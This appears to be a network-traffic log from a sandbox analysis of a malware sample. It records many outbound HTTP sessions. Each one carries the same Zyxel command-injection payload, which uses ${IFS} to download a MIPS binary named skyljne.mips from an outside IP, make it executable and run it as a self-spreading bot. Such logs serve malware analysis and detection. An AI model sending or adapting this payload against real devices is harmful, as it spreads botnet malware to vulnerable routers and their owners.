                                            Jan 14, 2024 15:50:48.608866930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6712192.168.2.2342372110.35.68.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608918905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6713192.168.2.2346622101.1.235.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608954906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6714192.168.2.2354882206.210.152.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608989954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6715192.168.2.234330283.57.192.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608990908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6716192.168.2.2341602177.156.139.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609009981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6717192.168.2.2353202138.181.1.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609062910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6718192.168.2.233584440.104.36.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609106064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6719192.168.2.2343166206.77.219.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609136105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6720192.168.2.2338628140.125.122.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609141111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6721192.168.2.235980895.230.12.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609189034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6722192.168.2.2356204211.9.72.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609230995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6723192.168.2.2336184154.224.104.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609251976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6724192.168.2.235402076.167.98.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609287977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6725192.168.2.2355062195.144.234.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609337091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6726192.168.2.234402832.242.91.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609349966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6727192.168.2.2347972135.208.115.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609369993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6728192.168.2.2343872203.87.238.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609397888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6729192.168.2.234203840.189.15.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609424114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6730192.168.2.2355390142.29.126.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609436989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6731192.168.2.2351632162.58.66.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609481096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6732192.168.2.2345872205.72.71.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609504938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6733192.168.2.2335080217.236.137.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609539986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6734192.168.2.2334308213.30.216.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609576941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6735192.168.2.234319243.180.229.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609602928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6736192.168.2.2337348160.105.178.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609635115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6737192.168.2.234039824.194.146.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609658003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6738192.168.2.2344352175.109.89.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609694004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6739192.168.2.2339924150.126.85.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609714985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6740192.168.2.2348616202.154.138.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609745979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6741192.168.2.2336990173.55.63.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609747887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6742192.168.2.2335094142.73.33.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609786034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6743192.168.2.2353120194.190.222.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609817028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6744192.168.2.233650090.173.241.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609858036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6745192.168.2.234703660.251.72.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609864950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6746192.168.2.2353350146.70.250.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609883070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6747192.168.2.234689889.241.240.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609920979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6748192.168.2.2333034206.29.55.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609926939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6749192.168.2.2333228116.41.165.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609961033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6750192.168.2.235818449.87.224.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.609999895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6751192.168.2.2344430187.67.249.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610043049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6752192.168.2.234047432.18.187.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610050917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6753192.168.2.2346774221.195.234.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610076904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6754192.168.2.236065271.150.67.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610110044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6755192.168.2.2336848197.31.133.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610146046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6756192.168.2.234964837.166.136.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610177040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6757192.168.2.2337134138.20.50.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610213995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6758192.168.2.236089890.196.147.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610229969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6759192.168.2.2352662190.205.207.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610239029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6760192.168.2.2349820114.242.240.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610248089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6761192.168.2.234546290.150.193.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610297918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6762192.168.2.2355894222.99.181.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610305071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6763192.168.2.2351484203.74.113.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610368967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6764192.168.2.2341186202.232.251.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610393047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6765192.168.2.2340296122.172.100.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610399961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6766192.168.2.2352730211.47.48.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610430956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6767192.168.2.2336754123.185.247.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610465050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6768192.168.2.2334050151.95.242.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610477924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6769192.168.2.234418295.197.196.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610531092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6770192.168.2.2341776175.73.177.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610558987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6771192.168.2.2359030205.109.140.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610577106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6772192.168.2.235232080.226.100.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610605001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6773192.168.2.2347686152.56.215.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610625029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6774192.168.2.234189693.215.136.58443
                                            TimestampBytes transferredDirectionData
